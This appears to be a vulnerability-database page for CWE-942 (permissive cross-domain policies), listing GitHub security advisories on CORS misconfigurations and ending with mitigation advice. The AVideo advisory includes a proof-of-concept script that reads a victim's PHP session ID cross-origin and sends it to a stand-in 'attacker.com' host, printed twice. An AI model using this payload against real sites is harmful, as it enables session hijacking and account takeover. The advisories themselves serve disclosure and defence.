CWE-942
AllowedPermissive Cross-domain Security Policy with Untrusted Domains
Abstraction: Variant · Status: Incomplete
The product uses a web-client protection mechanism such as a Content Security Policy (CSP) or cross-domain policy file, but the policy includes untrusted domains with which the web client is allowed to communicate.
177 vulnerabilities reference this CWE, most recent first.
GHSA-P88C-M6M4-2897
Vulnerability from github – Published: 2025-10-02 15:31 – Updated: 2025-10-02 15:31Incorrect Cross-Origin Resource Sharing (CORS) configuration in Hiberus Sintra. Cross-Origin Resource Sharing (CORS) allows browsers to make cross-domain requests in a controlled manner. This request has an “Origin” header that identifies the domain making the initial request and defines the protocol between a browser and a server to see if the request is allowed. An attacker can exploit this and potentially perform privileged actions and access confidential information when Access-Control-Allow-Credentials is enabled.
{
"affected": [],
"aliases": [
"CVE-2025-41010"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-02T13:15:31Z",
"severity": "MODERATE"
},
"details": "Incorrect Cross-Origin Resource Sharing (CORS) configuration in Hiberus Sintra. Cross-Origin Resource Sharing (CORS) allows browsers to make cross-domain requests in a controlled manner. This request has an \u201cOrigin\u201d header that identifies the domain making the initial request and defines the protocol between a browser and a server to see if the request is allowed. An attacker can exploit this and potentially perform privileged actions and access confidential information when Access-Control-Allow-Credentials is enabled.",
"id": "GHSA-p88c-m6m4-2897",
"modified": "2025-10-02T15:31:16Z",
"published": "2025-10-02T15:31:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41010"
},
{
"type": "WEB",
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-origin-resource-sharing-cors-hiberus-sintra"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-PRQW-X27X-86H2
Vulnerability from github – Published: 2024-05-14 15:32 – Updated: 2024-05-14 15:32HCL DRYiCE Lucy (now AEX) is affected by a Cross Origin Resource Sharing (CORS) vulnerability. The mobile app is vulnerable to a CORS misconfiguration which could potentially allow unauthorized access to the application resources from any web domain and enable cache poisoning attacks.
{
"affected": [],
"aliases": [
"CVE-2023-37526"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-14T13:20:18Z",
"severity": "MODERATE"
},
"details": "HCL DRYiCE Lucy (now AEX) is affected by a Cross Origin Resource Sharing (CORS) vulnerability. The mobile app is vulnerable to a CORS misconfiguration which could potentially allow unauthorized access to the application resources from any web domain and enable cache poisoning attacks.\n",
"id": "GHSA-prqw-x27x-86h2",
"modified": "2024-05-14T15:32:50Z",
"published": "2024-05-14T15:32:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37526"
},
{
"type": "WEB",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0113032"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-Q2FW-2Q69-QH7P
Vulnerability from github – Published: 2025-06-06 12:30 – Updated: 2025-06-06 12:30In IDF v0.10.0-0C03-03 and ZLF v0.10.0-0C03-04, a configuration error has been detected in cross-origin resource sharing (CORS). Exploiting this vulnerability requires authenticating to the device and executing certain commands that can be executed with view permission.
{
"affected": [],
"aliases": [
"CVE-2025-41363"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-06T12:15:22Z",
"severity": "MODERATE"
},
"details": "In IDF v0.10.0-0C03-03 and ZLF v0.10.0-0C03-04, a configuration error has been detected in cross-origin resource sharing (CORS). Exploiting this vulnerability requires authenticating to the device and executing certain commands that can be executed with view permission.",
"id": "GHSA-q2fw-2q69-qh7p",
"modified": "2025-06-06T12:30:33Z",
"published": "2025-06-06T12:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41363"
},
{
"type": "WEB",
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-zivs-idf-and-zlf-products"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-QC3P-398R-P59J
Vulnerability from github – Published: 2026-03-17 19:52 – Updated: 2026-03-20 21:23Summary
/objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover.
Details
File: objects/phpsessionid.json.php
allowOrigin();
$obj = new stdClass();
$obj->phpsessid = session_id();
echo _json_encode($obj);
No authentication is required. The allowOrigin() function in objects/functions.php (line ~2648) reflects the request Origin:
$HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN'];
header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN);
header("Access-Control-Allow-Credentials: true");
This means any external website can make a credentialed cross-origin request and read the session ID.
PoC
An attacker hosts the following page:
<script>
fetch('https://TARGET/objects/phpsessionid.json.php', {
credentials: 'include'
})
.then(r => r.json())
.then(d => {
// d.phpsessid = victim's session ID
document.location = 'https://attacker.com/steal?sid=' + d.phpsessid;
});
</script>
When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.
Impact
Account Takeover — Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "25.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33043"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T19:52:28Z",
"nvd_published_at": "2026-03-20T06:16:12Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`/objects/phpsessionid.json.php` exposes the current PHP session ID to any unauthenticated request. The `allowOrigin()` function reflects any `Origin` header back in `Access-Control-Allow-Origin` with `Access-Control-Allow-Credentials: true`, enabling cross-origin session theft and full account takeover.\n\n### Details\n\n**File:** `objects/phpsessionid.json.php`\n\n```php\nallowOrigin();\n$obj = new stdClass();\n$obj-\u003ephpsessid = session_id();\necho _json_encode($obj);\n```\n\nNo authentication is required. The `allowOrigin()` function in `objects/functions.php` (line ~2648) reflects the request Origin:\n\n```php\n$HTTP_ORIGIN = empty($_SERVER[\u0027HTTP_ORIGIN\u0027]) ? @$_SERVER[\u0027HTTP_REFERER\u0027] : $_SERVER[\u0027HTTP_ORIGIN\u0027];\nheader(\"Access-Control-Allow-Origin: \" . $HTTP_ORIGIN);\nheader(\"Access-Control-Allow-Credentials: true\");\n```\n\nThis means any external website can make a credentialed cross-origin request and read the session ID.\n\n### PoC\n\nAn attacker hosts the following page:\n\n```html\n\u003cscript\u003e\nfetch(\u0027https://TARGET/objects/phpsessionid.json.php\u0027, {\n credentials: \u0027include\u0027\n})\n.then(r =\u003e r.json())\n.then(d =\u003e {\n // d.phpsessid = victim\u0027s session ID\n document.location = \u0027https://attacker.com/steal?sid=\u0027 + d.phpsessid;\n});\n\u003c/script\u003e\n```\n\nWhen a logged-in AVideo user visits the attacker\u0027s page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.\n\n### Impact\n\n**Account Takeover** \u2014 Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.",
"id": "GHSA-qc3p-398r-p59j",
"modified": "2026-03-20T21:23:00Z",
"published": "2026-03-17T19:52:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qc3p-398r-p59j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33043"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/9f4f51e5df5e3343400f9d0068705f5482b6f930"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "AVideo affected by Session Hijacking via Unauthenticated Session ID Disclosure with Permissive CORS"
}
GHSA-QGRP-RJ4F-64XH
Vulnerability from github – Published: 2026-05-14 21:30 – Updated: 2026-05-15 15:30Inappropriate implementation in CORS in Google Chrome on Linux and ChromeOS prior to 148.0.7778.168 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)
{
"affected": [],
"aliases": [
"CVE-2026-8576"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-14T20:17:19Z",
"severity": "MODERATE"
},
"details": "Inappropriate implementation in CORS in Google Chrome on Linux and ChromeOS prior to 148.0.7778.168 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)",
"id": "GHSA-qgrp-rj4f-64xh",
"modified": "2026-05-15T15:30:40Z",
"published": "2026-05-14T21:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8576"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_12.html"
},
{
"type": "WEB",
"url": "https://issues.chromium.org/issues/496231853"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-QGVX-GH8H-GMQJ
Vulnerability from github – Published: 2023-11-14 12:30 – Updated: 2023-11-14 12:30A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1). When accessing the Information Server from affected products, the products use an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior.
{
"affected": [],
"aliases": [
"CVE-2023-46098"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-14T11:15:14Z",
"severity": "HIGH"
},
"details": "A vulnerability has been identified in SIMATIC PCS neo (All versions \u003c V4.1). When accessing the Information Server from affected products, the products use an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior.",
"id": "GHSA-qgvx-gh8h-gmqj",
"modified": "2023-11-14T12:30:27Z",
"published": "2023-11-14T12:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46098"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-456933.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R863-5PGM-C8G4
Vulnerability from github – Published: 2026-05-29 09:31 – Updated: 2026-05-29 09:31CORS misconfiguration in the REST API of Network Optix Nx Witness VMS before version 6.1.2, when running in the default Standard security mode, on Linux and Windows allows an unauthenticated remote attacker to steal the session token of an authenticated user and perform Administrator Account Takeover via a malicious cross-origin web page visited by the victim. The High security mode is not affected.Workaround:
For existing installations running in Standard security mode, set Access-Control-Allow-Credentials to false via the REST API: PATCH /rest/v2/system/settings with body {"supportedOrigins": "null"}. Alternatively, select High security level during initial setup.
Solution:
Update to Nx Witness VMS version 6.1.2 or later, in which Access-Control-Allow-Credentials is set to false in the default Standard security configuration.
{
"affected": [],
"aliases": [
"CVE-2026-10056"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-29T09:16:17Z",
"severity": "HIGH"
},
"details": "CORS misconfiguration in the REST API of Network Optix Nx Witness VMS before version 6.1.2, when running in the default Standard security mode, on Linux and Windows allows an unauthenticated remote attacker to steal the session token of an authenticated user and perform Administrator Account Takeover via a malicious cross-origin web page visited by the victim. The High security mode is not affected.Workaround:\n\nFor existing installations running in Standard security mode, set Access-Control-Allow-Credentials to false via the REST API: PATCH /rest/v2/system/settings with body {\"supportedOrigins\": \"null\"}. Alternatively, select High security level during initial setup.\n\nSolution:\n\nUpdate to Nx Witness VMS version 6.1.2 or later, in which Access-Control-Allow-Credentials is set to false in the default Standard security configuration.",
"id": "GHSA-r863-5pgm-c8g4",
"modified": "2026-05-29T09:31:05Z",
"published": "2026-05-29T09:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10056"
},
{
"type": "WEB",
"url": "https://support.networkoptix.com/hc/en-us/articles/39254208939159-How-to-Enable-CORS-Validation"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RQG6-587C-H9V3
Vulnerability from github – Published: 2025-06-16 12:30 – Updated: 2025-06-16 12:30An unauthenticated remote attacker can take advantage of the current overly permissive CORS policy to gain access and read the responses, potentially exposing sensitive data or enabling further attacks.
{
"affected": [],
"aliases": [
"CVE-2025-25264"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-16T10:15:19Z",
"severity": "HIGH"
},
"details": "An unauthenticated remote attacker can take advantage of the current overly permissive CORS policy to gain access and read the responses, potentially exposing sensitive data or enabling further attacks.",
"id": "GHSA-rqg6-587c-h9v3",
"modified": "2025-06-16T12:30:25Z",
"published": "2025-06-16T12:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25264"
},
{
"type": "WEB",
"url": "https://certvde.com/en/advisories/VDE-2025-018"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V9W2-V7J9-RJPR
Vulnerability from github – Published: 2021-09-02 22:02 – Updated: 2021-09-13 20:27In Eclipse Theia 0.3.9 to 1.8.1, the "mini-browser" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@theia/mini-browser"
},
"ranges": [
{
"events": [
{
"introduced": "0.3.9"
},
{
"fixed": "1.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-34435"
],
"database_specific": {
"cwe_ids": [
"CWE-346",
"CWE-668",
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2021-09-02T17:12:13Z",
"nvd_published_at": "2021-09-01T18:15:00Z",
"severity": "HIGH"
},
"details": "In Eclipse Theia 0.3.9 to 1.8.1, the \"mini-browser\" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file.",
"id": "GHSA-v9w2-v7j9-rjpr",
"modified": "2021-09-13T20:27:30Z",
"published": "2021-09-02T22:02:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34435"
},
{
"type": "WEB",
"url": "https://github.com/eclipse-theia/theia/pull/8759"
},
{
"type": "WEB",
"url": "https://github.com/eclipse-theia/theia/commit/0761dcf5fe3c14c27432683d42d2c526ad0cfbd5"
},
{
"type": "WEB",
"url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=568018"
},
{
"type": "PACKAGE",
"url": "https://github.com/eclipse-theia/theia"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Remote code execution in Eclipse Theia"
}
GHSA-VHQM-XJCF-G4X8
Vulnerability from github – Published: 2026-04-08 15:31 – Updated: 2026-04-08 15:31CORS misconfiguration in CoolerControl/coolercontrold <4.0.0 allows unauthenticated remote attackers to read data and send commands to the service via malicious websites
{
"affected": [],
"aliases": [
"CVE-2026-5302"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-08T13:16:43Z",
"severity": "MODERATE"
},
"details": "CORS misconfiguration in CoolerControl/coolercontrold \u003c4.0.0 allows unauthenticated remote attackers to read data and send commands to the service via malicious websites",
"id": "GHSA-vhqm-xjcf-g4x8",
"modified": "2026-04-08T15:31:44Z",
"published": "2026-04-08T15:31:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5302"
},
{
"type": "WEB",
"url": "https://gitlab.com/coolercontrol/coolercontrol/-/blob/2.0.0/coolercontrold/src/api/mod.rs?ref_type=tags#L374"
},
{
"type": "WEB",
"url": "https://gitlab.com/coolercontrol/coolercontrol/-/releases/4.0.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
Mitigation
Strategy: Attack Surface Reduction
Define a restrictive Content Security Policy [REF-1486] or cross-domain policy file.
Mitigation
Strategy: Attack Surface Reduction
Avoid using wildcards in the CSP / cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server.
Mitigation
Strategy: Environment Hardening
For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server.
No CAPEC attack patterns related to this CWE.